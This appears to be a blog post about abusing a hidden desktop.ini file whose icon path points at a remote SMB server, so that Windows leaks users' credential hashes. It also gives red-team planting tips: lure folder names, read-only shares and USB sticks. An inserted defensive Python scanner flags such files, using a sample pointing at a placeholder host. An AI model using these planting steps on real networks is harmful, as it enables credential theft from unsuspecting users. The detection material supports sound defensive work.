One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to its users: Explorer checks for a ==hidden== desktop.ini file that points the OS to the folder's view preferences (icon, localized name and so on).
Canary works by directing those preferences to a remote server; when that request comes in, we know the folder has been entered… very sneaky! (I didn't know about this technique until I was exploring the canarytokens.org available payloads – check them out: https://canarytokens.org/generate)
So I figured, if we point it to a remote location with SMB authentication on it, we know that Windows will automatically send its current user's credentials to the location, I'll get hashes!
If you are ever on a RedTeam and you have access to a shared folder, plant one in there (you will need to make the share read-only for the desktop.ini to persist) with a name like PeopleGettingSacked or Movies or CEO Holiday Pics … whatever, you know better than me…
Additionally, if you put the desktop.ini flat on a USB stick, as soon as the pen is mounted (unless auto-run is disabled) it will open up the folder automatically (actioning the attack).
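From the defender's side, the same property that makes this work is what makes it easy to hunt for: a desktop.ini that references anything off the local machine (a UNC path or a URL) is unusual and worth a look. The following is an added example, not code from the original post or from the Canary project, of a small scanner that walks a directory tree or mounted share, decodes each desktop.ini (Explorer commonly writes them as UTF-16 with a BOM), and flags any key whose value points at a remote location. The sample desktop.ini contents and the host name EXAMPLE-HOST are constructed for the demonstration.

```python
import codecs
import os
import re
import sys
from dataclasses import dataclass

# Values that point outside the local machine: UNC paths (\\host\share\...) or URL schemes.
REMOTE_REF = re.compile(r"(\\\\[^\\\s]+\\[^\s,]+|\b(?:https?|ftp|file)://\S+)", re.IGNORECASE)


@dataclass
class Finding:
    path: str        # file the value came from
    key: str         # "[section] key"
    value: str       # full value as written in the file
    remote_ref: str  # the remote path/URL that triggered the finding


def decode_ini(data: bytes) -> str:
    """Decode a desktop.ini file; Explorer usually writes UTF-16 with a BOM."""
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return data.decode("utf-16")  # the codec consumes the BOM
    try:
        return data.decode("utf-8-sig")
    except UnicodeDecodeError:
        return data.decode("cp1252", errors="replace")


def parse_ini(text: str):
    """Minimal INI reader: yields (section, key, value); tolerant of odd files."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            yield section, key.strip(), value.strip()


def find_remote_refs(text: str, path: str = "desktop.ini") -> list:
    """Return a Finding for every key whose value references a UNC path or URL."""
    findings = []
    for section, key, value in parse_ini(text):
        match = REMOTE_REF.search(value)
        if match:
            label = f"[{section}] {key}" if section else key
            findings.append(Finding(path, label, value, match.group(0)))
    return findings


def scan_tree(root: str) -> list:
    """Walk a directory (or a mounted share) and check every desktop.ini found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower() != "desktop.ini":
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    findings.extend(find_remote_refs(decode_ini(fh.read()), full))
            except OSError:
                continue  # unreadable file: skip, but keep scanning
    return findings


# Constructed samples: a normal Explorer-style file and one pointing at a remote host.
BENIGN_INI = """[.ShellClassInfo]
IconResource=%SystemRoot%\\system32\\imageres.dll,-3
LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21770
"""
SUSPICIOUS_INI = """[.ShellClassInfo]
IconResource=\\\\EXAMPLE-HOST\\share\\icon.ico,0
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:  # no path given: run against the constructed samples
        results = find_remote_refs(BENIGN_INI, "benign/desktop.ini")
        results += find_remote_refs(SUSPICIOUS_INI, "share/desktop.ini")
    for f in results:
        print(f"{f.path}: {f.key} -> {f.remote_ref}")
```

Run it with the root of a file share or a freshly mounted USB drive as the argument; on a Windows host it can be scheduled against each share, and a hit is a good prompt to check proxy and firewall logs for outbound SMB (TCP 445) to the referenced host. Blocking outbound SMB at the network edge removes the credential-leak half of the trick even where the file itself is missed.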
I bet this is already being used out there! … very sneaky/powerful, I had to share … in fact, I can't help thinking this might be a very well known thing and I'm out of the loop -_-
I think there is some caching of the desktop.ini too (at least with Windows 10, as when I ejected my evil USB I could still see incoming requests from my machine) – will follow up with that.
An in-depth look at the options available when writing a desktop.ini file, possibly more opportunities for trouble? https://hwiegman.home.xs4all.nl/desktopini.html
Attacker & User view: https://www.youtube.com/watch?v=t8zqJm5d8gg